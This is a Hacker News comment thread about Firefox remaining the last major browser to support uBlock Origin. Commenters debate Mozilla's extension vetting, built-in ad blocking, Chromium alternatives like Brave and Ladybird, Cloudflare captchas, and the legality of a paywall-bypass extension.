Settings

Theme

Firefox is now the last major browser that still supports uBlock Origin

pcworld.com

1730 points by DemiGuru · 742 comments

Reader

67 threads
GeekyBear

Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

They don't do it for every extension, but they do so for a wide selection of popular options.

> Recommended extensions differ from other extensions that are regularly reviewed by Firefox staff in that they are curated extensions that meet the highest standards of security, functionality and user experience. After receiving Recommended status, safety standards are maintained through automated checks, monitoring, and periodic technical reviews

https://support.mozilla.org/en-US/kb/recommended-extensions-...

  • gurjeet

    Complete, authoritative list of Firefox extensions officially recommended by Mozilla.

    https://addons.mozilla.org/en-US/firefox/search/?promoted=re...

    Some quite informative discussion on Firefox subreddit when I discovered and posted the above list there a few months ago.

    https://www.reddit.com/r/firefox/comments/1pyvx2v/complete_a...

    The Recommended Extensions program description: https://support.mozilla.org/en-US/kb/recommended-extensions-...

    • inigyou

      Thanks. Just installed Consent-O-Matic. I avoided it earlier because I assumed it consented, but by default it does not consent.

      • pipes

        Hrm... Maybe I should be using this instead of I don't care about cookies then, since that isn't recommended

      • jstrebel

        Consent-O-Matic is a bit of an edge case because their last update was more than a year ago and their Github repo looks pretty dead. This makes me not really trust it anymore.

      • PunchyHamster

        I've had few sites that froze when using it coz it clicked something wrong ;/

    • quotemstr

      Interesting they'd recommend Decentraleyes: its default configuration disabled all HTTP link prefetching, which hurts performance in a way not apparent from the extension description.

      • kqp

        Decentraleyes has worse issues than that, it’s been mostly abandoned for 7 years and never covered much [1]. LocalCDN is better, but coverage is still insufficient, it still has no chance of actually preventing a CDN connection more than once in a blue moon. Modern privacy folks don’t recommend tools like this because they don’t really work and they do make your network and timing signature much more unique and fingerprintable.

        [1]: https://git.synz.io/Synzvato/decentraleyes/-/tree/master/res...

      • much-to-learn

        You should have prefetching off by default tbh

    • benatkin

      I seem to remember TamperMonkey being on there but not ViolentMonkey, which I didn't agree with. However, I see neither of them on there. Both are available but not recommended. I wonder what is going on with that.

      • culi

        Probably just resources. Mozilla has to vet each update to give them the "recommended" badge and so they probably focus on the most popular extensions

        • benatkin

          They should have vetted ViolentMonkey instead of TamperMonkey the last time around.

          • embedding-shape

            > Tampermonkey - Rating 4.7 (5,306 reviews) - 760,294 Users

            > Violentmonkey - Rating 4.7 (793 reviews) - 164,622 Users

            On Google Web Store, it's 11,000,000 users VS 900,000 users.

            Their popularity seems different by a magnitude, hardly surprising Firefox/Mozilla would chose to focus on one above the other.

            • culi

              I see GP's point tho. The original Greacemonkey was open-sourced. Tampermonkey was the successor and is proprietary. Violentmonkey came to fix that. I wouldn't be surprised if Mozilla rejected TM because of not being OS and rejected VM because of lack of popularity

      • eek2121

        I suspect they no longer recommend either because either can download/execute scripts that Mozilla can't review, and the recommended extensions are reviewed, so they don't want to give users the wrong impression.

        I could be wrong, however.

        • DANmode

          I suspect it’s because it’s a pain to review that type of codebase, and they update it decently often.

      • VCFundedGenYer

        FireMonkey is the one to use. Not verified, but that doesn't matter.

  • big_toast

    That's pretty cool. Thanks for pointing that out. I don't see where it says 'on every update' unless you're referring to the automated checks?

    I've always wished extensions had more granular permissions though (a la phones, but more so). I think automated ai security checks sound promising soon.

    • elashri

      Automated checks are done for every extension on every update. But their recommend extensions they feature on the Extension store, they do other extensive checks for each update.

    • socalgal2

      what permissions do you suggest?

      • yjftsjthsd-h

        I'd like a way to easily specify exactly what sites an extension can run on. There are extensions that I'd like to run on a subset - often just one or two sites - without giving them access do anything else. For that matter, a way to only activate an extension as a one-off when I click it and on no other tabs.

        • raffraffraff

          What about container specific permissions? If they implemented that it would be enough for me since I tend to split up my services by type (eg: shopping, banking, work, hack) so enabling an extensive on a specific set of containers would rock. Right now I think the only control we have is over private tabs/windows?

          • DANmode

            It took them over a decade to implement per-site isolation when other browsers had it, so don’t hold your breath.

            Firefox isn’t the security-first choice.

            They don’t pretend to be.

        • Paradigm2020

          I'm using an extension that does exactly that¹, actually every update of the extension is mostly about then supporting more websites and asking permission to access those.

          So maybe more developers could do a all sites and manually select sites option?

          ¹BPC extension

          • jstanley

            The extension can declare which websites it can access, but the other commenter was looking for the ability for the user to declare which websites it can access.

  • swed420

    > Firefox is also the only browser that vets uBlock's code on every update to make sure the developer hasn't inserted spyware or malware into the extension.

    They could save themselves the trouble if Firefox simply baked in its own ad-blocking, but since Google basically owns them, we all know that will never happen.

    Ladybird browser is going to be awesome.

    • dralley

      Websites already can barely be assed to care about supporting Firefox users, doing adblocking by default is a great way to get websites to start putting up banners that say "our website does not work with your browser, please switch to Chrome" en-masse.

      And Mozilla did develop anti-fingerprinting tech, but they can't enable it by default because it breaks lots of websites and when a website doesn't work they're not going to appreciate Mozilla for protecting them, they're going to be pissed that it doesn't work.

      • kazinator

        > banners that say "our website does not work with your browser, please switch to Chrome"

        Which in practice means "switch to using a Firefox extension which fakes looking like Chrome, and just to selected shitty sites like ours".

        • HappMacDonald

          Which in practice would only be executed by the same crowd of people who would have opted-in to the security features on the first pass.

          • kazinator

            It would be executed by anyone who experiences a problem using a site with Firefox and asks for help about it in a forum, or chat AI, or finds a YT video about it, etc.

            Non-technical people do follow recommendations like installing an extension to help with a problem. Especially if they see the same recommendation from multiple sources, and testimonials as to its efficacy.

          • OtomotO

            Which in turn should be built into the browser and done automatically

            • drabbiticus

              I don't think Firefox should automatically spoof a Chrome user agent.

              • tux3

                There's a long tradition of browsers doing exactly that.

                The Chrome user agent starts with Mozilla/5.0, ends with Safari, claims to be like Gecko, based on KHTML, and somewhere in there is the string Chrome.

                That was done exactly because people were trying to gate which browsers could or couldn't see their page by name, instead of by missing functionality.

              • OtomotO

                If a site doesn't work, I disagree. It should.

                The web is becoming a monopoly anyway... a contradiction to what web once meant.

        • scheme271

          In practice, it'd probably look like switching to chrome for the majority of users. A lot of tech saavy users would install a plugin but that's a lot of friction especially for random sites or even for an important site. Using chrome or edge would be easier for most users.

      • somenameforme

        Brave has native ad-block and anti finger-printing, enabled by default, and the web works excellently as in I don't know of a single site that doesn't work with it.

        • Medowar

          Brave is based on Chromium and inherits basically all compability, that this brings.

          Firefox with Gecko is a different engine entirely and that sometimes causes compatibility issues or different behaviour, that websites have to account for.

        • dbspin

          Brave's ad block is pretty ineffectual by itself. For example it doesn't block youtube adverts. Recently switched to Firefox with Ublock origin, and loving it. So much more efficient and quick than it was back in the day when we all switched to Chrome.

          • wyclif

            For example it doesn't block youtube adverts

            Pretty sure that's not true. I don't see any YT adverts when using Brave, and I don't have any extensions installed.

            • somenameforme

              It definitely blocks YouTube ads.

            • dbspin

              I don't know what to tell you... It most definitely does not block youtube adverts for me and never had / did... Also, I found Ublock origin updates less reliable / frequent on Brave. Since switching zero issues.

              • somenameforme

                Perhaps you were disabling their adblocker by trying to use ublock? In general there's no reason for additional plugins - they also have native custom filters, scriptlets, and so on.

                • dbspin

                  No... As tech helper for various family and friends, I've been the one to clean install brave on a variety of machines. I typically demonstrate youtube before and after ublock for them, so they can see its effects. Never once not had adverts on a clean brave install. Not a representative sample obviously, but I've installed it for a fair few folks over the years.

              • vjvjvjvjghv

                “For me” seems to be the keyword here. From what I know it works for most Brave users.

                • bossyTeacher

                  >From what I know it works for most Brave users.

                  "From what I know" is epistemologically equivalent to "For me".

                  • vjvjvjvjghv

                    I can name at least 10 people who are using Brave after I recommended it and don’t see YouTube ads.

          • heelix

            Similar experience with firefox and ublock origin. I make the cut early, when chrome was threatening to make the change originally and have had a really good experience. Many, many things just work with the ads stripped out. Youtube and other streaming services - I don't know how people can even use them without proper filtering.

          • tejohnso

            I never see YouTube ads since switching to Brave.

          • vjvjvjvjghv

            My Brave installation blocks YouTube ads on iPhone and Mac. Every few weeks there is a day where the ads show but the next day they are gone again.

        • moebrowne

          Not saying your wrong, but the number, and type, of sites you browse is going to be a very narrow slice of the sites that all Firefox users browse

      • Grom_PE

        Websites blocking Firefox because of ad blocking has happened before:

        https://web.archive.org/web/20070817224229/http://whyfirefox...

        • VCFundedGenYer

          Very, very easily defeated by a user agent switcher.

          Snapchat tries to block Firefox, but all you have to do is fuzz the agent to say you're Chrome and then you're in with no issues.

      • tomkarho

        > start putting up banners that say "our website does not work with your browser, please switch to Chrome"

        That's how IE 6 was killed.

        • dspillett

          The final death of IE6 was because corporates finally stopped using it⁰ and the reason for that had nothing to do with sites/apps refusing to work. If we'd said "we don't support IE6" they'd either say "the contract we signed years ago somehow says otherwise" or "fair enough, we'll use someone else's solution then".

          What killed it was IE6 not supporting TLS1.0 out of the box or TLS1.1+ at all, and that started to make them fail external audits. After years of telling them IE6 was holding us back implementing best-practise security on their instances of our apps¹ and being ignored because doing anything about it their side was too much hassle, external auditors started refusing to give them relevant certificates & such because of their systems not being up to best practise (or even good practise by that point!) and suddenly they made the effort to no longer have anyone in their orgs using IE6.

          --------

          [0] source: I was working on software serving the banking industry (customer facing & investment sides, not trading) around that time and years either side

          [1] Even having annual conversations like:

              ! The pen test results say you should disable anything below TLS1.0 (and later 1.1), and you haven't. Please do. 
              ? Are you sure? We'd *really* like to, as we've repeatedly mentioned, but that will block your IE6 users.
              ! Yes! You must follow the recommendations!
              ? Excellent. Done.
              [a short time passes]
              ! Your application is broken for some of our users!
              ? Yep. They are using IE6 without TLS enabled. 
              ? Either you need to upgrade their configurations or tell us, in writing please, to break from best practise and reenable the older protocols.
              [another short time later]
              ! Please reenable the older protocols.
          • tomkarho

            I'd like to think this conspiracy at least contributed: https://blog.chriszacharias.com/a-conspiracy-to-kill-ie6

            Unless it's all fud in which case I shall archive this under headcanon.

            • dspillett

              Oh that certainly did the trick for home users, but I was having to deal with IE6 for our clients (at least one of them was IE6 only), as were people I knew working in or otherwise supporting other corporate environments, for several years after that.

              Some management types might have even seen YouTube potentially blocking IE6 users as an advantage for keeping with IE6 to save bandwidth on their creaking external network links!

        • pjmlp

          It was killed by a lawsuit, mostly.

          Also FE devs using all new Chrome shinny APIs, and their Electron junk are also to blame, and they aren't going to throw their toys away.

          • tentacleuno

            If nothing else, I really do hope that the greater AI usage leads to more adoption (and hopefully interest) of native frameworks.

            • pjmlp

              If only, everyone brags about Claude and Fable, yet they can't do anything better than Electron and React for TUIs.

      • cookiengineer

        With a normal Firefox on desktop on Linux, I get unsolvable recaptchas all the time, especially on cloudflare pages.

        Ironically, if I fake instead a chromium to be on Windows (UA and Sec-CH headers), I am allowed most of the time even though my TCP fingerprint must mismatch then.

        It's annoying to see what the normal web has become. Can't even read news anymore.

        Ironically, all these bot defenses make it easier for bots to scrape their website, but make it harder for actual users to use them.

        The only bot defense web app firewall that still works with Firefox seems to be Anubis. Pretty much all others autoflag Linux users as bot users, which feels insane if you think about less web developers must know about how botnets work.

        • happymellon

          > With a normal Firefox on desktop on Linux, I get unsolvable recaptchas all the time, especially on cloudflare pages.

          I get this with Chrome on MacOS.

          I'm becoming more convinced that Cloudflare is the bane of the internet.

        • notpushkin

          > I get unsolvable recaptchas all the time, especially on cloudflare pages.

          If you really mean reCAPTCHA (the one with a “select all squares that have X” kinda challenges), then Cloudflare hasn’t used that for quite a while now. archive.today uses a Cloudflare-looking (old style) page with a reCAPTCHA (and they do serve it quite often), but I don’t think I’ve seen other sites do that.

          • Macha

            No you can get literally unsolveable captchas with cloudflare. You tick the box and it just refreshes and displays the unticked box again. Or people it on gateway endpoints that just return plain text errors (Humble does this).

            • inigyou

              There's code that makes it do something different after 100+ failed retries but you can speed it up by editing the _cf_chl_rc_* cookie (which is just a number). I haven't yet worked out what it does differently.

        • naet

          With Firefox on my windows computer I never get unsolvable recaptchas or have any issues with Cloudflare.

        • dspillett

          > I get unsolvable recaptchas all the time, especially on cloudflare pages

          Repeated problems with cf and similar like this seem to be more common for users behind CGNAT (most mobile users for example). Presumably all the other hosts sharing the same final outgoing address(es), some of which will be running bots either deliberately or because they've been infiltrated by malware, confuse the heuristics that decide how often checks should be made.

      • PunchyHamster

        we have clause in deal with clients about browser support (IIRC 5% or something like that). FF was just mismanaged so badly that the usage dropped so far into low single digit % it's not the question of maliciously not supporting it, it's the question of not wasting time on browser barely anyone of actual users use.

        So, most sites work, but are never tested on FF, because there is no point, client won't pay for it.

      • swed420

        The level of mental gymnastics in this thread denying the extent to which companies like Google (and their puppets like Mozilla) control the internet is too damn high.

        Fortunately if projects like Ladybird gain enough momentum, websites might be forced to cater to it. Time will tell.

        • inigyou

          You know you can make a browser based on Firefox's core and don't need to make a new one from scratch that'll never get past Cloudflare?

          • swed420

            > You know you can make a browser based on Firefox's core

            If you want to inherit all of Firefox's flaws, I suppose.

            > and don't need to make a new one from scratch that'll never get past Cloudflare?

            Considering Cloudflare is a sponsor of Ladybird, something tells me they're going to grant an exception for it.

            • chironjit

              Sadly Cloudflare's browser detector is the main barrier to using Servo for most websites, so they're not the angel they seem

            • Larrikin

              What flaws exactly?

              People on here love to moan about Firefox because Mozilla did one thing at some point in the existence of the company they didn't like. But then just cede the Internet to Google and chromium clones because at some point when they were a crappy junior JS dev, Chrome had some better tooling over Firebug so they just got used to testing in one browser. Maybe they also like to remember how Firefox, a decade ago, couldn't handle 1000 tab sessions.

              I hope Firefox keeps up the fight but HN loves to crap all over them for not being perfect.

              • swed420

                > What flaws exactly?

                For starters, they notoriously make configuration a difficult and shifting game of whac-o-mole to do simple things such as disabling the AI that nobody asked for:

                https://news.ycombinator.com/item?id=45926779

                It's also become more unstable in recent years, and I'm not even talking about 1000 tab sessions. It will crash with only a handful of tabs fairly regularly on linux.

                For more flaws, look at everything LibreWolf, Waterfox, etc do to make up for them.

                • inigyou

                  I don't think the AI is part of the core. You know you get to change all that stuff when you make a fork, right?

                  • swed420

                    But you would still be left with all of the other issues pointed out by me and others. Plus, the parent seemed to be referring to FF, not just its core, so I replied accordingly.

              • thisislife2

                > What flaws exactly?

                It's not modular, for example. You can't just use the Gecko engine in your project. To do so, you have to deal and hack through the whole codebase of the Firefox browser.

                • dralley

                  Well for years HN was complaining that Mozilla was trying to fix that, because it broke XUL extensions.

                  • thisislife2

                    It's been many years since Firefox dropped support for XUL extensions and XUL itself. It even lead to Firefox being forked, and Palemoon browser (amongst other forks of it) now carry the legacy of XUL ( https://udn.realityripple.com/ ). Also, that hasn't stopped Firefox from offering stand alone Gecko on Android ( https://mozilla.github.io/geckoview/ ) now, has it? If they can do it for Android, why not all the other desktop platforms? Start redirecting the 300+ million dollars they have earned from Firefox to the developers instead of the CEO et al and maybe we will see some good innovation happening in Firefox ...

              • GoblinSlayer

                People complain about Chrome as often as about psychopaths, because it can't be fixed.

              • shevy-java

                > What flaws exactly?

                Look how few people use it. Do you still want to claim that firefox is perfect? Because if not I suggest to read up on the last 15 years why people stopped using Firefox. Not all of which has to do with Google.

                > I hope Firefox keeps up the fight but HN loves to crap all over them for not being perfect.

                This shows a total lack of understanding. You assume that Firefox is perfect. It is not. It is a pretty bad browser. There is a reason why adChromium won. I wish it would be different but it is not.

              • tombert

                Can’t speak for all users, but at least as of about six months ago, there appears to be a bug in Firefox in NixOS where the shader cache doesn’t appear to be able to write properly, and as such video acceleration doesn’t work. It became most evident when I was trying to watch 360-degree videos in Immich.

                Entirely possible that this is an issue specific to NixOS or my machine, but because of that issue I switched over to Brave.

                I would like to go back to Firefox at some point. Maybe I’ll see if I can make a patch to fix video acceleration on NixOS.

                • fouc

                  the obvious thing to do is keep using firefox as your daily driver, and load up the other browser as needed for the video etc.

                  I'm being tongue-in-cheek here because it seems most people just give up on safari/firefox if one thing doesn't work and go to some chromium-based browser as their default driver. That's sad.

                  • duskdozer

                    I don't understand it. I do keep an ungoogled chromium install around for the few times when I suspect a site is intentionally breaking itself for firefox, and it's not a big deal to open on occasion. Otherwise, if you value customization at all, you have to use firefox.

                  • tombert

                    I am not going to use two separate browsers purely so that a larger percentage of my time is spent in Firefox. That’s not a solution; the solution is to fix Firefox.

                    I would rather spend 100% of my time in Firefox but that’s not doable right now.

                  • kakacik

                    Thats what I do - that 1 page in 100, if at all, goes to chrome. But basically 100% of pages I ever use work fine.

                    They will have to pry with significant force firefox with ublock origin from my old dusty finger bones... fuck the rest for selling us all out.

                    Even if it won't move the needle a bit, I can look at myself in the mirror in this specific regard and be content that I didnt bow my head like bland masses did and didnt work towards massive enshittification of our global society from now on.

                    Because thats what its all about, nothing less. With our choices, we shape future for our kids and grandkids. Shame on you, all you rich faangs who are directly helping this. Godwin's law is never too far in such cases and history wont be kind to you, no reason to be

                  • picofarad

                    What you say is what I do, Firefox is open all the time, I switch to brave or edge if ff won't load something. I use adnauseam as adblocker.

                    I have never had chrome on windows 10 or 11; nor chromium.

                    For a year chase.com wouldn't allow me to login from Firefox. Dumb.

                    • inigyou

                      Did you go to your local Chase branch with Firefox on your phone and pretend you have no idea why it doesn't work?

                • 7bit

                  Aw man, one issue you don't even know is Firefox's fault?

                  • tombert

                    Regardless of whose fault it is, it still makes the browser unusable for me.

          • bossyTeacher

            > You know you can make a browser based on Firefox's core and don't need to make a new one from scratch that'll never get past Cloudflare?

            Under some definitions, the browser IS the core. You are bound at a fundamental level to your parent if you build on someone else's foundations. Firefox is probably a great one to do it but worth knowing that someone else owns the land upon which you stand.

        • bossyTeacher

          > Fortunately if projects like Ladybird gain enough momentum, websites might be forced to cater to it. Time will tell.

          Ladybird has corporate sponsors too. Sponsorship is influence. Obviously, the more sponsorships you have the less influence an individual one have but it is worth knowing.

          • swed420

            True, but it ultimately depends on the terms of the sponsorship.

            One would hope that a project like Ladybird (which is motivated to compete with a product which was ruined by Google's sponsorship) would choose those terms carefully.

        • Plont

          They literally didn't deny that. They made a separate point you appear not to have actually read.

          Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either. They'd absolutely end up allowing their own "acceptable" telemetry and ads. Even if they didn't, it would be unlikely to ever be as effective as Ublock Origin. Much like how Chromium browsers' built-in adblocking is barely anything in comparison, even on Manifest V2.

          And yet, for now, Firefox and Mozilla is by far the lesser evil. I like a few of the Chromium browsers well enough, but they are ultimately at the mercy of Google.

          I hope Ladybird does well, too.

          • swed420

            Their separate point was ignored because it was an irrelevant tangent.

            > Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either.

            This is in a thread about how we should be happy that FF is vetting code for us. Do we trust them or don't we?

            > And yet, for now, Firefox and Mozilla is by far the lesser evil.

            I'm instinctively tempted to agree, but the difference is so negligible at this point that the only sign I would is the fact I'm still using FF due to momentum (as well as Ladybird not being ready from prime time yet).

            FF/Mozilla has proven itself to be controlled opposition, so I'm not very interested in games of "lesser-of-two-evils" abuser logic that has infected politics and many other spheres in a race to the bottom.

            • aaplok

              > Do we trust them or don't we?

              GP trusts them for reviewing external extension code, and ensure that it does not contain malware, but not for not inserting exception to their own telemetry if they wrote the code themselves.

              Or, more likely, they feel that having two independent actors collaborating on the extension (one by writing and the other by reviewing) yields a more trustworthy outcome than either actor on their own.

              • swed420

                That was a rhetorical question.

                Mozilla have given us plenty of reasons to not trust them, which makes it hilarious that anybody would think it's noteworthy they're reviewing the code of Raymond Hill of all people.

                • Dylan16807

                  We could tell it was rhetorical, to imply the position was ridiculous. But when accepting nuance there is a real answer.

                  > Raymond Hill of all people.

                  As good as he's been, he's still just one person with a hobby project. Yes please review it!

                  And what if he gets hacked?

            • 7bit

              >> Regardless, I don't want baked-in Firefox adblocking in part because I don't trust Mozilla with that task either.

              > This is in a thread about how we should be happy that FF is vetting code for us. Do we trust them or don't we?

              Are you joking? You brought the claim to the table, and now that people see the flaws in it you deny them talking about it? You're some mental gymnast..

    • epihelix

      That's like suggesting that someone using LLMs to assist coding, could save themselves the trouble by writing the code by hand.

      Yes, Firefox could do everything, but then it'd turn back into Mozilla. The whole point of the extensions framework is to allow modular extensibility. And it's much easier to vet for malware than to code afresh and maintain.

      What stuns me is that most people still use browsers that cannot block ads, seem genuinely annoyed by ads, but don't want to even try switching to a browser that will easily block those ads. It's amazing how much crap people are willing to wade through when the alternative is trying something new.

      • swed420

        > That's like suggesting that someone using LLMs to assist coding, could save themselves the trouble by writing the code by hand.

        No it's not.

        > Yes, Firefox could do everything, but then it'd turn back into Mozilla. The whole point of the extensions framework is to allow modular extensibility. And it's much easier to vet for malware than to code afresh and maintain.

        No, quite the opposite. FF has a history of adopting extensions as baked-in functionality if they prove useful/popular enough. There are tons of examples of this from the past for various features, which is great.

        But that fact makes it even more absurd that they refuse to do the same for what is likely their most popular extension of all time: uBlock Origin

        • notpushkin

          Waterfox, a Firefox fork, has actually built a builtin qdblocker. (And yes, they do whitelist their search partner by default, but you can turn that off.) Apparently it’s faster than uBlock Origin, but there’s been problems on some websites, so I’ll be sticking with uBO for now.

          Edit: actually, it seems the underlying functionality was built by Mozilla themselves, just not exposed in the UI yet: https://news.ycombinator.com/item?id=49309020

      • kazinator

        Not "everything", just a few common things that almost every user wants.

      • oblio

        > Yes, Firefox could do everything, but then it'd turn back into Mozilla.

        It's been 20+ years, nobody cares about that anymore.

    • WorldMaker

      Admiral and several other of the more obnoxious ad networks already claim that Firefox is an ad blocker simply because of its out-of-the-box blocking support for third-party cookies and those ad networks nag you to use another browser. If Firefox added actual ad blocking out of the box I can't imagine the havoc that would cause and how many more websites would claim that they don't work at all in Firefox.

      • glenstein

        A sharp point in this context because yet again, Mozilla faces contradictory demands in every direction. In today's edition, they are failing their users by not hard coding the ablocking in but also they need to give up on ad blocking because if they try they'll simply be blacklisted.

        • WorldMaker

          From my perspective that's not a reason to give up on ad blocking if Firefox wanted to bundle that out of the box, that's another reason that the Chrome hegemony is bad for everyone and ad networks that want to block Firefox "as an ad blocker" probably deserve to die. I was just pointing out that the fears in this thread of how ad networks would react to Firefox blocking ads out of the box are already here whether or not Firefox increases its ad blocking defaults.

        • Dylan16807

          "Do X." versus "Don't do X." is a set of demands faced by most programs.

    • elabajaba

      Firefox started shipping adblock-rust in March (Brave's built in adblocker). It's not properly wired up in the UI yet but you can enable it and add filter lists in about:config.

      • thisislife2

        I am cynical about this move - this could be used by them to cripple support for uBlock Origin eventually, to keep Google happy.

        • fhn

          If they cripple support for uBlock Origin, there will be no more Firefox. That's a promise.

    • firefax

      >since Google basically owns them

      Google has been trying to kill them since they moved the Chrome team into the same building as the now defunct SF office.

      (Apparently they offered people a lot of money? There are some words I could use to describe people who do things they think are unethical for cash I'll leave unsaid.)

    • stubish

      If Firefox baked in ad blocking, they would have to then deal with the financial incentive to make it worse. Sponsored ads, 'good' ads, government announcements, election propaganda... there is a slippery slope they are better off not getting on. A trusted 3rd party from the wider community seems a better option in many ways. The alternative is starting a web browser with a manifesto welded on that essentially states 'death to all advertising', and until that can be crowd funded I can't see that happening in today's world.

      What I am surprised about is that none of the browsers or forks have created a specialist plugin API for adblocking and maybe other filtering. Provide what is needed and only that (keeping the surface tiny), and then evolve the general purpose API in the way they need. I don't think we need V2 of the API any more, except for keeping this one absolutely critical plugin working, do we?

      • elabajaba

        Firefox has baked in adblocking (using adblock-rust, brave's built in adblocker), but it has to be enabled through about:config and not the settings UI.

      • thisislife2

        Both the Brave browser, and Vivaldi browser have some kind of built-in adblocking API. The makers of Brave browser even pay some of the adblocking list curators.

    • 3371

      People believe ublock because it's reputable and not affiliated with browsers IMO.

    • cuu508

      In one of the monthly update videos Andreas mentioned that although they are working on a basic built-in adblocker for Ladybird, long-term they want extension support and the adblocking functionality to be in an extension.

      • ryandrake

        Why does ad blocking always have to be relegated to an extension? Browsers build in so many things. Why do they all draw the line at a feature like ad blocking that every user wants?

        • inigyou

          Because modular architectures are good? I don't know what to say here. Even if it was built in it should be a built-in extension.

        • happymellon

          Because they want a level of plausible deniability.

          • ta8903

            The way uBO works already provides a layer of plausible deniability. It's just a content blocker that loads filter lists maintained by other people.

            • happymellon

              I'm not sure if you responded to the wrong comment, but the gpp was suggesting building it in by default.

              If Firefox included it by default then it would remove a layer of deniability.

              • ryandrake

                What do they need to deny? Ad blocking is clearly a feature many users want. It’s often the only extension people install. If I were Firefox, I’d build it right into the core of the engine. Turn it on with a checkbox and/or custom blocklist sources.

              • ta8903

                Yes, I meant building it in by default won't remove any deniability, because it will just be a content blocker where users can load their own filters (with maybe some adblocking filters suggested by default).

    • deweywsu

      See, this is the kind of thing that makes Firefox cool. They have not only just as good of developer console tools as Chrome, they have forward thinking, truly user-oriented policies. They have had trouble in the recent past at securing funding, but something tells me their user philosophy might save them when all the others turn completely to corporate greed as their main operating mechanism (if they already haven't).

      • swed420

        Your reply makes no sense. To the original point, if they had user-oriented policies, they'd have ad-blocking baked in by now. But they don't, and likely never will.

        • bigbadfeline

          > Your reply makes no sense. To the original point, if they had user-oriented policies, they'd have ad-blocking baked in by now.

          It's not black and white, and your inability to see the larger context is disturbing.

          You could, by the same logic, criticize Mozilla for not serving you coffee which is certainly a "user-oriented policy" "baked-in" or rather "brewed-in". But we must be realistic about how far UOPs can be stretched, Mozilla is better than the rest, which includes large corps with far more money than them. If you can do better than Mozilla, I'm all ears.

          Next, an ad-blocker needs continuous maintenance - someone started a good one long time ago and apparently loves to improve it and maintain the various lists it uses - why should Mozilla strain to compete with one of their best contributors? - that would be both rude and dumb, and they'd be wasting resources too. There's absolutely no upside to your proposition but you keep insisting.

          • swed420

            > Next, an ad-blocker needs continuous maintenance - someone started a good one long time ago and apparently loves to improve it and maintain the various lists it uses - why should Mozilla strain to compete with one of their best contributors? - that would be both rude and dumb, and they'd be wasting resources too. There's absolutely no upside to your proposition but you keep insisting.

            One would hope that's one of the more useful things an LLM could assist with if not now, very soon. In the meantime, there's no reason they couldn't have uBlock kept as an extension but bundled by default like they've done with other functionality over the years. Wait, never mind. There's one rea$on why they wouldn't, and it's already been $tated.

        • ruckcbek

          You're absolutely right.

    • cyberrock

      After watching them butcher their own side tabs implementation, I don't know if we really want that, unless they're actually hiring the uBO team directly.

  • mrbluecoat

    Good for them! Glad they have the resources to do so. The free Brave Origin on Linux also has good native ad-blocking in my experience.

  • ololobus

    I’m a huge fan of Mozilla and Firefox specifically, but I don’t think that the way classical adblock extensions are made is the right way. Instead, it should be done as Apple/Safari do it [1]: the browser provides an API to hook/set a block list of identifiers that should be blocked, it could be resource hostnames, html signatures, need to think how to improve the API, but this way it’s completely safe, extension has zero access to the actual page content. Apple does the same for caller id apps. Afaik, Android has this API too, but the last time I checked, all relevant extensions were just “give me your whole phone control or web page access”, so Google clearly doesn’t enforce it

    Yes, it kinda gives more control to the platform, but so far, iOS extensions that use this API worked surprisingly well for me

    Please, correct me if I am wrong and uBclock can already work in this restricted mode

    And the last thing, if people really want to give someone a full page content access, they surely should be able to do that, so kudos to Mozilla

    [1] https://developer.apple.com/documentation/safariservices/cre...

    • commoner

      Absolutely not. This is exactly why people have a problem with Chromium, which now has some of the same restrictions on extensions as Safari (Manifest V3).

      - uBlock Origin works best on Firefox: https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b...

      - uBlock Origin Lite FAQ: https://github.com/uBlockOrigin/uBOL-home/wiki/Frequently-as...

    • Macha

      One of my biggest annoyances about my iPad is how much less effective the content blockers on Safari are than on real Firefox and ublock origin that I have on my Android phone and had on my previous windows tablet. Also iOS “Firefox” can’t run any adblockers, whether ublock origin or iOS content blockers so I have to use Safari and put up without consent-o-matic or tab sync

      For example, ublock origin is able to patch out anti-adblock scripts that Safari content blockers cannot. Try tvtropes for an example. Works fine with firefox and ublock origin, displays a “allow ads of subscribe” instead of the content on safari.

    • jchw

      You can only get a very limited uBlock Origin facsimile, not the real thing. A lot of browsers have a uBlock Lite. It's missing a lot of useful features IMO.

    • arendtio

      I think that would limit its capabilities so much that it would be much easier for ad platforms to find ways to circumvent it.

    • inigyou

      So you want to make it super easy to bypass the block by randomising identifiers every so often, and then the blocker will have to go through the full update process?

      Maybe this works for some extensions but an ad blocker has to be maximally dynamic to work.

    • pmontra

      With that approach how am I going to block ads on long-tail-site.example.com and lots-of-ads.new-domain.com? I'll let uBO read my traffic. Firefox is reading my traffic anyway.

  • poilcn

    I kept Firefox on one system for testing and had some non-popular extensions installed there. I rarely opened it and when I did it would spew me with a message that one of the extensions got malicious code installed

  • Beijinger

    Also for youtube download plug-ins. yt-dpl does not work for youtube anymore.

    • culi

      Still works for me. The occasional 403 has always been an issue

      • fhn

        download everything now because this is going to be a larger problem

  • Beijinger

    I recommend two more:

    1. pass paywalls clean.

    2. Social Fixer

    • armadyl

      Rather than introducing additional attack surface and privacy risks with yet another extension you can just use archive.is/archive.ph instead of Bypass Paywalls Clean.

      Or, just pay for journalism since it’s not free to do.

    • culi

      You mean Bypass Paywalls Clean? It's illegal and it's not even on the Firefox extension store. You have to download it from some Russian Github alternative and manually install it.

      I will say however, it works remarkably well. I haven't seen a paywall in years!

      • Beijinger

        Why should it be illegal?

        • culi

          I don't think it should but it was taken down from Firefox's store because of a DMCA copyright takedown. Firefox was required by law to remove it. Using the extension itself is a legal grey area, but distributing it is usually illegal.

          • johannes1234321

            > because of a DMCA

            That law doesn't apply to many HN readers

            • inigyou

              It does apply to Mozilla, and some version of it applies to every country that trades with the USA (because the USA makes all trade deals contingent on it)

              • culi

                Exactly. And I don't think there's many Cuban, Iranian, and Yemeni people on HN

        • WD-42

          It’s not illegal. But it’s a step too far for some.

          • culi

            It's unquestionably illegal to distribute. As in, if Mozilla (or anyone else hit by the DMCA) were to add it back to the store, they would be acting illegally.

            • account42

              Why do people keep repeating this BS. The DMCA doesn't grant random lawyers the ability to make things illegal. All does give platforms the ability to get out of lawsuits by pre-emptively taking down the things mentioned in the notification but that doesn't make not doing that illegal.

        • _ZeD_

          It's not. Op is wrong

          • culi

            It's been taken down by DMCA copyright strikes on every western platform that could distribute it. That's why you can't find it on the Firefox extension store anymore

            • gilrain

              None of that means it’s “illegal”. You apparently think something being removed to reduce legal risk means it’s illegal, but that doesn’t follow.

              • culi

